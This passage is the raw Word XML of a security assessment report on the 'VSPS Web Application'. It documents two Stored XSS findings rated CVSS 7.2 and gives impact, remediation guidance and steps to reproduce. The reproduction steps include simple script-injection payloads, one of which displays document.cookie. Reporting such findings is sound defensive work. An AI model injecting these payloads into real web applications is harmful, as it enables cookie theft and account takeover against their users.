          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2AEA49" w14:textId="6EF8827A" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A Stored Cross-Site Scripting vulnerability in the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application poses a significant risk to the organization, impacting trust, data integrity, and regulatory compliance. Financially, a successful attack could lead to substantial costs associated with incident response, forensic investigations, system remediation, and potential legal fees. While direct financial loss estimates are difficult to pinpoint without specific context, the cost of a data breach, which XSS can facilitate, can run into millions of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dollars.From</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a compliance perspective, particularly with NIST CSF requirements for government systems, this vulnerability represents a severe breakdown in data protection and system integrity controls. Failure to protect sensitive data and ensure the secure operation of web applications can result in non-compliance findings, leading to regulatory penalties and a tarnished reputation with auditing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bodies.The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> reputation of the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application and the government entity it serves would be severely damaged. Public trust, which is paramount for government operations, could erode significantly if it becomes known that user data or administrative interfaces are vulnerable to such attacks. This can deter future public engagement and create an impression of negligence. Furthermore, XSS can enable unauthorized access to user accounts, leading to data breaches involving Personally Identifiable Information (PII) or other sensitive government data, compromising its confidentiality and integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626AAAA4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3121314B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement a robust input validation and output encoding framework across the entire application. This framework should enforce strict validation rules for all user inputs at the point of entry and apply context-specific output encoding for all data before it is rendered in a web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>browser.-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adopt a Content </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Security Policy (CSP) to mitigate the impact of any potential XSS vulnerabilities that might bypass other defenses. CSP should be configured to whitelist trusted sources for scripts, styles, and other resources, thereby preventing the execution of arbitrary inline scripts or scripts from untrusted </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>domains.-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Review and update security architecture to ensure a "defense-in-depth" approach, where multiple layers of security controls are in place to prevent and detect web-based attacks. This includes secure coding guidelines, regular security training for developers, and automated security testing tools as part of the SDLC.TACTICAL FIX (Code Implementation</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> All user-supplied input must be validated on the server-side to ensure it conforms to expected data types, lengths, and patterns. Reject or sanitize any input that contains unexpected characters or potentially malicious script </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>elements.-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apply context-sensitive output encoding to all user-supplied data immediately before it is rendered on a web page. For HTML contexts, use HTML entity encoding. For JavaScript contexts, use JavaScript encoding. For URL contexts, use URL encoding. Avoid custom encoding routines and instead use well-established, security-audited encoding libraries (e.g., OWASP ESAPI encoder, Apache Commons Text </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringEscapeUtils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> For the Struts 1 framework, ensure that JSP tags are configured to escape output by default. For example, use the &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c:out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt; tag from JSTL with the '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>escapeXml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="true"' attribute, or ensure similar functionality is active for custom Struts tags that render user data.- Migrate away from Struts 1 where possible, as it is an end-of-life framework with known vulnerabilities and lacks modern security features compared to newer frameworks. If migration is not immediately feasible, ensure all available security patches are applied, and augment its defenses with external WAF (Web Application Firewall) rules and strict server-side input sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616CCA4F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259A1E27" w14:textId="3054AB4B" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Navigate to a user-facing input form on the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application, such as a comment section, user profile editor, or any administrative content creation interface.2. In an input field that allows for free-form text entry, enter the following malicious payload: &lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;.3. Submit the form to store the malicious data in the application's backend.4. Log out as the attacker and log in as a different user (or navigate to a page where the submitted content is displayed to other users or administrators).5. Access the page where the previously stored input is rendered. Observe that a JavaScript alert box appears displaying the victim's browser cookies, demonstrating successful execution of the injected script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248395C3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67151A47" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9DF7BA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/79.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A355D8E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://portswigger.net/web-security/cross-site-scripting/stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C52F943" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/vuln/detail/CVE-2022-22964</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26314FAA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/vuln/detail/CVE-2021-21972</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC9FBCF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCDFFE0"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5714FB58"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28DE1FC0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Stored Cross-Site Scripting (XSS)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6C74C776" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 7.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AFB3403"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160F408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2073725"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9DB8167" w14:textId="0AF8DB1A"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024</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50002BE"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C7600F3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.2 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="56BB8145"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22B0AC7"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84953AE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A03:2021-Injection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01BF675"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BCA9B7A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="5A8C875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25B07E9"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94B594D"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AADA8ED"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33670A8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="19C1980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C31ECAD"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2519D4A"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00BDDB4"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244F040" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="04375B9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2F1F0AD"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6AAF62A"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7B27083"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39347D4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AC2A0CD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779FC198" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Stored Cross-Site Scripting (XSS) is a type of web security vulnerability that allows an attacker to inject malicious client-side scripts into web pages. These scripts are then stored on the web application's server (e.g., in a database) and are delivered to other users whenever they access the affected page. The root cause of this vulnerability is the application's failure to properly validate, sanitize, or encode user-supplied input before it is stored and subsequently rendered in a web browser. When an application stores user input without adequate security controls, an attacker can embed malicious JavaScript code into legitimate data fields, such as comments, forum posts, profile descriptions, or other persistent data storage areas. When another user's browser loads the page containing this stored malicious script, the script executes within the context of the victim's browser, as if it were part of the legitimate website. This allows the attacker to bypass the Same-Origin Policy and perform actions such as stealing session cookies, defacing the website, redirecting users to malicious sites, or performing actions on behalf of the victim user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D2DE5A" w14:textId="4C009C36" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A8FF89" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A Stored Cross-Site Scripting (XSS) vulnerability poses significant risks to the organization, affecting data integrity, customer trust, and regulatory compliance. Attackers can leverage this flaw to steal sensitive user data, including personal identifiable information (PII) and authentication credentials, leading to potential data breaches. Such breaches can incur substantial financial losses from incident response, forensic investigations, legal fees, and potential regulatory fines. For example, under NIST CSF guidelines, the inability to protect stored data would be a significant compliance failure. Loss of customer data and unauthorized actions on user accounts can severely damage the organization's reputation and erode customer trust, impacting user retention and business continuity. Furthermore, compromised user accounts could lead to further attacks against the organization or its partners, creating a broader security incident. The cost of remediation, coupled with potential brand damage and legal liabilities, makes this a high-priority risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485FE045" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B8512" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9CBA64" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Implement a robust, centralized input validation and output encoding framework across the entire application stack. This framework should ensure that all user-supplied data is validated against strict white-listing rules upon input and properly encoded before being rendered in any client-side context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7404F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Adopt a Content Security Policy (CSP) that explicitly whitelists trusted sources for content like scripts, styles, and images, significantly reducing the impact of XSS attacks by restricting the execution of arbitrary scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5AD018" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Utilize modern web application frameworks and libraries that provide built-in XSS protection mechanisms, ensuring they are kept </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>up-to-date</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to leverage the latest security features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE07CD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Implement a secure software development lifecycle (SSDLC) that incorporates security testing, including static and dynamic analysis, throughout the development process to identify and mitigate XSS vulnerabilities early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AE3091" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="008A1680" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8DEE96" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Sanitize all user-supplied input on the server-side immediately upon receipt, before it is stored in a database or file system. This involves filtering out or escaping potentially malicious characters and constructs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C06D245" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Apply appropriate output encoding for all user-supplied data before it is rendered in any HTML, JavaScript, CSS, or URL context. Use context-specific encoding functions provided by a secure encoding library (e.g., OWASP ESAPI or similar framework functions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBDAE4F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- For HTML contexts, use HTML entity encoding for all user data displayed on pages. For attribute contexts, use HTML attribute encoding. For JavaScript contexts, use JavaScript string encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D4CF51" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Mark session cookies with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag to prevent client-side scripts from accessing them, thereby mitigating session hijacking attacks even if an XSS payload is successfully executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1621F5E6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Set the Secure flag on cookies to ensure they are only sent over encrypted HTTPS connections, further protecting them from interception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE3371F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Regularly review and update all third-party libraries and components to ensure they do not contain known XSS vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC66D70" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69613EF9" w14:textId="0B509114" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Identify an input field in the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application that accepts and stores user-supplied data, such as a comment section, user profile description, or forum post. For example, navigate to a page where users can submit feedback. 2. In the identified input field, enter a malicious Stored XSS payload. A simple payload for demonstration purposes could be: &lt;script&gt;alert('XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>');&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
